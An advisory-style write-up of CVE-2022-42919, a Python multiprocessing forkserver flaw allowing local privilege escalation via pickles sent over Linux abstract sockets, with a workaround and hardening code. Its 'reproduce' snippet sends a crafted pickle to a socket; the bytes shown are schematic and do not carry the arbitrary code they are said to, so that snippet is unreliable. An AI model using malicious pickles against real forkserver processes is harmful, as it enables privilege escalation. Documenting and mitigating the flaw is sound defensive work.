A security vulnerability, identified as CVE-2022-42919, has been discovered in Python 3.9.x and Python 3.10.x through 3.10.8 on Linux systems. In non-default configurations, a flaw in the Python multiprocessing library's forkserver start method allows local privilege escalation. Here, we explore the details of this vulnerability, provide code snippets, link to original references, and explain its impact on affected systems.

Vulnerability Details

The Python multiprocessing library, specifically when employed with the forkserver start method on Linux systems, permits pickles to be deserialized from any user in the same machine-local network namespace. In several system configurations, this means any user on the same machine. Pickles can execute arbitrary code, so a local user can escalate privileges to those of the user that runs any forkserver process.

This vulnerability is specific to Linux systems, as these are the only ones that support abstract namespace sockets. CPython versions before 3.9 don't utilize Linux abstract namespace sockets by default.

To reproduce the vulnerability, an attacker can run the following code snippet:

import multiprocessing as mp
import pickle
import socket

# Using the forkserver start method
mp.set_start_method('forkserver')

# Setting up the socket
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

# In a non-default configuration, change the abstract socket file
abstract_socket_file = b'\x00custom_socket_file'
s.connect(abstract_socket_file)

# Pickle containing arbitrary code
exploit_pickle = b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07getattr\x94\x93\x94\x8c\x08builtins\x94\x8c\x03print\x94\x93\x94\x86\x94R\x94.'

# Sending the exploit pickle
s.sendall(exploit_pickle)

Workaround

A temporary mitigation for this vulnerability is to set multiprocessing.util.abstract_sockets_supported to False:

import multiprocessing.util

multiprocessing.util.abstract_sockets_supported = False

Note that this workaround only applies to the forkserver start method, which is not the default on affected systems.
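To apply the workaround early and confirm it took effect, the following added example (not part of the original advisory) sets the flag and then checks the kind of address multiprocessing will choose for its AF_UNIX listener, since the forkserver obtains its listening address from the same multiprocessing.connection.arbitrary_address helper. The function names is_abstract_address, harden_multiprocessing and forkserver_address_is_safe are chosen for this example.

```python
"""Apply and verify the CVE-2022-42919 workaround: force multiprocessing to
pick filesystem Unix sockets (protected by file permissions) instead of
Linux abstract namespace sockets. Added example; not advisory code."""
import multiprocessing.util as util
from multiprocessing.connection import arbitrary_address


def is_abstract_address(address) -> bool:
    """Abstract-namespace AF_UNIX addresses start with a NUL byte and have
    no filesystem path, so directory and file permissions never apply."""
    if isinstance(address, bytes):
        return address.startswith(b"\0")
    return isinstance(address, str) and address.startswith("\0")


def harden_multiprocessing() -> bool:
    """Disable abstract sockets. Must run before the forkserver is started
    (i.e. before any Process/Pool is created with the forkserver method),
    because the listener address is fixed once the server is running.
    Returns the previous value so callers can see whether anything changed."""
    previous = util.abstract_sockets_supported
    util.abstract_sockets_supported = False
    return previous


def forkserver_address_is_safe() -> bool:
    """Ask multiprocessing for the address it would assign to a new AF_UNIX
    listener and check that it lives on the filesystem; a path under the
    per-process temp directory is only connectable by its owner."""
    address = arbitrary_address("AF_UNIX")
    return not is_abstract_address(address)


if __name__ == "__main__":
    print("abstract sockets enabled before hardening:",
          util.abstract_sockets_supported)
    harden_multiprocessing()
    print("listener address on filesystem:", forkserver_address_is_safe())
```

On Linux the first print shows True for affected versions and the second shows True only after hardening; on other platforms the flag is already False.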

Note that support for users manually specifying an abstract namespace socket was added as a bugfix in Python 3.7.8 and 3.8.4. However, in CPython versions before 3.9, users would need to make specific, uncommon API calls to do so.

References

- Python 3.9.0a4 Changelog
- Python 3.7.8 Changelog
- Python 3.8.4 Changelog

Conclusion

The CVE-2022-42919 vulnerability in Python 3.9.x and 3.10.x on Linux poses a serious risk for local privilege escalation in non-default configurations. Users are advised to implement the provided workaround and stay informed about potential patches and updates addressing this issue.

Timeline

Published on: 11/07/2022 00:15:00 UTC
Last modified on: 11/23/2022 03:15:00 UTC